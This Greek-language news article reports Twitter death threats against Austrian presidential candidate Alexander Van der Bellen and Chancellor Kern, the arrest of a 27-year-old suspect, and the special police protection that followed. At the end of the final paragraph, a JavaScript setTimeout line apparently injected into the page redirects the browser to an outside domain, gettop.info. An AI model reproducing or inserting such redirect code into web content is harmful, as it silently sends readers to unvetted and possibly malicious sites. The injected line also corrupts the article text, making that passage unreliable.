Αυστρία: Απειλές κατά της ζωής του προεδρικού υποψηφίου Βαν Ντερ Μπέλε

0
7

 

Απειλές κατά της ζωής του δεχόταν εδώ και καιρό τόσο ο καγκελάριος της Αυστρίας Κρίστιαν Κερν όσο και ο νικητής του δεύτερου γύρου των προεδρικών εκλογών και υποψήφιος πρόεδρος Αλεξάντερ Βαν Ντερ Μπέλεν. Η αυστριακή Αστυνομία έφθασε στα ίχνη ενός 27χρονου τον οποίο και συνέλαβε στην πόλη Μπρουκ αν ντερ Λάιτα, ανατολικά της Βιέννης.

Απειλές κατά της ζωής του Αλεξάντερ Βαν ντερ Μπέλεν και της οικογένειάς του διατυπώνονταν εδώ και αρκετές ημέρες και προσετέθησαν παρόμοιες απειλές κατά του καγκελάριου Κερν μέσω της υπηρεσίας αποστολής σύντομων μηνυμάτων στο Twitter, όπως ανακοίνωσε η Ομοσπονδιακή Υπηρεσία Προστασίας του Συντάγματος και Καταπολέμησης της Τρομοκρατίας.

Μετά τον εντοπισμό του ηλεκτρονικού υπολογιστή από τον οποίο γινόταν η αποστολή των μηνυμάτων, η αστυνομία προέβη σε σύλληψη του υπόπτου, ο οποίος φέρεται να έχει ψυχολογικά προβλήματα και να έχει στο μεταξύ ομολογήσει τις πράξεις του, ενώ του έχει απαγγελθεί κατηγορία για επικίνδυνες απειλές και υποδαύλιση μίσους.

Σύμφωνα με το υπουργείο Εσωτερικών, λόγω των συνεχιζόμενων και εντεινόμενων απειλών κατά της ζωής του ιδίου και της οικογενείας του από ακροδεξιούς κύκλους, ο Αλεξάντερ Βαν ντερ Μπέλεν έχει τεθεί υπό διαρκή αστυνομική προστασία από το πρωί της Πέμπτης και ήδη από την ειδική μονάδα «Κόμπρα» υπάρχει σχέδιο για την προστασία της κατοικίας του.

Μεταξύ των άλλων μέτρων ασφάλειας, ο ίδιος θα συνοδεύεται συνεχώς από τρεις άνδρες της ειδικής μονάδας στις καθημερινές διαδρομές του όπως και στις προεκλογικές εμφανίσεις του. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here